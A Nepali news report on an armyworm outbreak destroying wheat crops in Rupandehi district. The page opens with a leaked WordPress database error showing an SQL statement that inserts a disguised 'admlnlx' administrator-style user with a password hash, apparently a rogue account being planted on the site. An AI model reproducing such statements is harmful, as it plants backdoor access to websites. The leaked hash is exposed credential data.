WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMDMMORU6f/5b46tu5Uwq.zxix6kVW0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 11:48:41', '', 'admlnlx', 'admlnlx')
भैरहवा,माघ ५ –
फौजी किराको प्रकोपले रुपन्देहीमा करिब ६ करोड ९० लाख बराबरको गहुँ बाली नष्ट गरेको छ ।
करिब १२ हजार हेक्टर गहुँ बालीमा फैलीएको प्रकोपले ३४ सय ५० मेट्रिक टन बराबरको गहुँ नष्ट गरेको कृषि विकास कार्यालयले जनाएको छ । २ हप्ता अघि देखि शुरु भएको फौजी किराको प्रकोप अझै नियन्त्रणमा आउन सकेको छैन् । शुरुमा रुपन्देहीको पूर्वी गाविसहरुबाट शुरु भएको प्रकोप पश्चिम तर्फ फैलिदै गएको छ ।
अहिले रुपन्देहीको १ नगरपालिका सहित १० गाविसमा प्रकोपका रुपमा फैलिएको फौजी किरा सामान्य रुपमा जिल्ला भरिनै फैलिएको कार्यालयले जनाएको छ । क्षेत्रीय कृषि निर्देशनालय पोखरा, क्षेत्रीय बाली संरक्षण प्रयोगशाला पोखरा र जिल्ला कृषि विकास कार्यालय रुपन्देही प्रको प नियन्त्रणमा जुते पनि नियन्त्रणमा आउन नसकेको हो । कृषि प्राविधिकहरु गाँउ गाँउमा गएर बिषादी प्रयोगका लागि किसानहरुलाई प्राविधिक सल्लाह दिइरहेका छन् । कार्यालयले करिब ७० हजार बराबरको बिषादी बढी प्रकोप भएका गाविसहरुमा बितरण गरेको छ ।